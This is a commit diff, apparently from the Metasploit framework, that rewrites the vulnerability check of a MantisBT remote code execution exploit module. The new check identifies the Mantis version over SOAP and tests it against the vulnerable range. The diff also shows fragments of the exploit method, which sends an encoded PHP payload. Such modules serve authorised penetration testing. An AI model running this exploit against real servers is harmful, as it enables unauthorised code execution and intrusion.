fix check method
Christian Mehlmauer
parent
862af074e9
commit
eaad4e0bea
|
|
@ -9,6 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include REXML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -48,13 +49,56 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
res = exec_php('phpinfo(); die();', true)
|
||||
def get_mantis_version
|
||||
xml = Document.new
|
||||
xml.add_element(
|
||||
"soapenv:Envelope",
|
||||
{
|
||||
'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance",
|
||||
'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
|
||||
'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
|
||||
'xmlns:man' => "http://futureware.biz/mantisconnect"
|
||||
})
|
||||
xml.root.add_element("soapenv:Header")
|
||||
xml.root.add_element("soapenv:Body")
|
||||
body = xml.root.elements[2]
|
||||
body.add_element("man:mc_version",
|
||||
{ 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" }
|
||||
)
|
||||
|
||||
if res && res.body && res.body.include?('This program makes use of the Zend')
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'api', 'soap', 'mantisconnect.php'),
|
||||
'ctype' => 'text/xml; charset=UTF-8',
|
||||
'headers' => { 'SOAPAction' => 'http://www.mantisbt.org/bugs/api/soap/mantisconnect.php/mc_version'},
|
||||
'data' => xml.to_s
|
||||
})
|
||||
if res && res.code == 200
|
||||
match = res.body.match(/<ns1:mc_versionResponse><return xsi:type="xsd:string">(.+)<\/return><\/ns1:mc_versionResponse>/)
|
||||
if match && match.length == 2
|
||||
version = match[1]
|
||||
print_status("Detected Mantis version #{version}")
|
||||
return version
|
||||
end
|
||||
end
|
||||
|
||||
print_status("Can not detect Mantis version")
|
||||
return nil
|
||||
end
|
||||
|
||||
def check
|
||||
version = get_mantis_version
|
||||
|
||||
return Exploit::CheckCode::Unknown if version.nil?
|
||||
|
||||
gem_version = Gem::Version.new(version)
|
||||
gem_version_introduced = Gem::Version.new('1.2.0a3')
|
||||
gem_version_fixed = Gem::Version.new('1.2.18')
|
||||
|
||||
if gem_version < gem_version_fixed && gem_version >= gem_version_introduced
|
||||
return Msf::Exploit::CheckCode::Appears
|
||||
else
|
||||
return Exploit::CheckCode::Unknown
|
||||
return Msf::Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
|
|
@ -317,6 +361,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
get_mantis_version
|
||||
unless exec_php(payload.encoded)
|
||||
fail_with(Failure::Unknown, 'Exploit failed, aborting.')
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue